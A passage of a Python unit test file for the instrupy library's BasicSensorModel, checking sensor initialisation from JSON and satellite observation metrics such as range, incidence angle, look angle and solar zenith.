e071ae46387661fb262c4873fe39b493e313e755
| 41,899
|
py
|
Python
|
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for instrupy.basic_sensor_model.
"""
import unittest
import numpy as np
import random
from deepdiff import DeepDiff
from instrupy.basic_sensor_model import BasicSensorModel
from instrupy.util import Orientation, ViewGeometry, SphericalGeometry, ReferenceFrame, SyntheticDataConfiguration, Maneuver
RE = 6378.137 # [km] radius of Earth
def orbital_speed(alt_km):
return np.sqrt(398600.5/(RE + alt_km))
class TestBasicSensorModel(unittest.TestCase):
def test_from_json(self):
""" Test initialization of basic sensor in the many different ways allowed.
"""
# Typical case
o = BasicSensorModel.from_json('{"name": "Atom", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs1", \
"pointingOption": [{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, \
{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":10}, \
{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":-10} \
], \
"syntheticDataConfig": {"sourceFilePaths": ["C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f000.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f001.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f002.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f003.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f004.nc"], \
"geophysicalVar": "TMP_P0_L1_GLL0", "interpolMethod":"SCIPY_LINEAR"}}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertEqual(o.name, "Atom")
self.assertIsInstance(o.name, str)
self.assertIsInstance(o._id, str)
self.assertEqual(o._id, "bs1")
self.assertEqual(o.mass, 10)
self.assertIsInstance(o.mass, float)
self.assertEqual(o.volume, 12.45)
self.assertIsInstance(o.volume, float)
self.assertEqual(o.power, 12)
self.assertIsInstance(o.power, float)
self.assertEqual(o.dataRate, 40)
self.assertIsInstance(o.dataRate, float)
self.assertEqual(o.bitsPerPixel, 8)
self.assertIsInstance(o.bitsPerPixel, int)
self.assertIsInstance(o.orientation, Orientation)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}))
self.assertIsInstance(o.fieldOfView, ViewGeometry)
self.assertEqual(o.fieldOfView, ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter":5})))
self.assertIsInstance(o.sceneFieldOfView, ViewGeometry)
self.assertEqual(o.sceneFieldOfView, o.fieldOfView) # since sceneFieldOfView is not initialized, it has is equal to the instrument fieldOfView
self.assertIsInstance(o.maneuver, Maneuver)
self.assertEqual(o.maneuver, Maneuver.from_dict({"maneuverType": "CIRCULAR", "diameter":10}))
self.assertIsInstance(o.pointingOption, list)
self.assertIsInstance(o.pointingOption[0], Orientation)
self.assertIsInstance(o.pointingOption[1], Orientation)
self.assertIsInstance(o.pointingOption[2], Orientation)
self.assertEqual(o.pointingOption[0], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}))
self.assertEqual(o.pointingOption[1], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":10}))
self.assertEqual(o.pointingOption[2], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":-10}))
self.assertIsInstance(o.fieldOfRegard[0], ViewGeometry)
self.assertEqual(o.fieldOfRegard[0], ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter":15})))
self.assertEqual(len(o.fieldOfRegard), 1)
self.assertEqual(o.numberDetectorRows, 5)
self.assertIsInstance(o.numberDetectorRows, int)
self.assertEqual(o.numberDetectorCols, 10)
self.assertIsInstance(o.numberDetectorCols, int)
self.assertIsInstance(o.syntheticDataConfig, SyntheticDataConfiguration)
self.assertEqual(o.syntheticDataConfig, SyntheticDataConfiguration.from_dict({"sourceFilePaths": ["C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f000.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f001.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f002.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f003.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f004.nc"], \
"geophysicalVar": "TMP_P0_L1_GLL0", "interpolMethod":"SCIPY_LINEAR"}))
# Test: Test default initialization of orientation, fieldOfViewGeometry, sceneFieldOfViewGeometry, maneuver, numberDetectorRows, numberDetectorCols
o = BasicSensorModel.from_json('{}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertIsNone(o.name)
self.assertIsNotNone(o._id) # random id is assigned
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertIsNone(o.power)
self.assertIsNone(o.dataRate)
self.assertIsNone(o.bitsPerPixel)
self.assertIsInstance(o.orientation, Orientation)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}))
self.assertEqual(o.fieldOfView, ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter": 25})))
self.assertIsInstance(o.sceneFieldOfView, ViewGeometry)
self.assertEqual(o.sceneFieldOfView, o.fieldOfView) # since sceneFieldOfView is not initialized, it has is equal to the instrument fieldOfView
self.assertIsNone(o.maneuver, Maneuver)
self.assertIsNone(o.fieldOfRegard)
self.assertEqual(o.numberDetectorRows, 4)
self.assertIsInstance(o.numberDetectorRows, int)
self.assertEqual(o.numberDetectorCols, 4)
self.assertIsInstance(o.numberDetectorCols, int)
self.assertIsNone(o.syntheticDataConfig)
# Test sceneFieldOfFViewGeometry and corresponding fieldOfRegard initialization (fieldOfRegard must be built considering sceneFieldOfViewGeometry and not fieldOfViewGeometry)
o = BasicSensorModel.from_json('{"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":0.1, "angleWidth":60 }, \
"sceneFieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":60}, \
"maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":0, "A_rollMax": 30} \
}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertEqual(o.fieldOfView, ViewGeometry.from_dict({"orientation": {"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":0.1, "angleWidth":60}}))
self.assertEqual(o.sceneFieldOfView, ViewGeometry.from_dict({"orientation": {"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":60}}))
ddiff = DeepDiff(o.fieldOfRegard, [ViewGeometry.from_dict({"orientation": {"referenceFrame":"NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":15},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":90}})], ignore_numeric_type_changes=True)
self.assertEqual(ddiff, {}, msg=ddiff)
# Test: Incomplete field-of-view geometry specification, test that Exception is raised
with self.assertRaises(Exception):
BasicSensorModel.from_json('{"name": "Atom","mass":10,"volume":12.45, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight": 10 }}')
def test_calc_data_metrics_1(self):
""" Simple test involving satellite above POI at (lat = 0,lon = 0). Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], 500, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 0, delta = 0.1)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], 0, delta = 0.1)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and (lat=0, lon=0) position
def test_calc_data_metrics_2_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the East.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector may influence the sign of look angle.
Test with reference model which is good for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# 0 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# 90 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# 90 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_2_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the East.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector may influence the sign of look angle.
Test with reference model which works for larger angles for a special case with range = RE
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], poi_lon_deg, delta = 0.15)
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -1*orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], poi_lon_deg, delta = 0.15)
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*poi_lon_deg, delta = 0.15)
def test_calc_data_metrics_3_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the West.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector may influence the sign of look angle.
Test with reference model which is good for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_3_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the West.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector may influence the sign of look angle.
Test with alternate reference model which works for larger angles for a special case with range = RE
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lon_deg), delta = 0.15)
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lon_deg), delta = 0.15)
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -1*orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lon_deg), delta = 0.15)
def test_calc_data_metrics_4_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to South.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with reference model which is good for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test 90 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_4_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to South.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with alternate reference model which works for larger angles for a special case with range = RE.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -1*orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
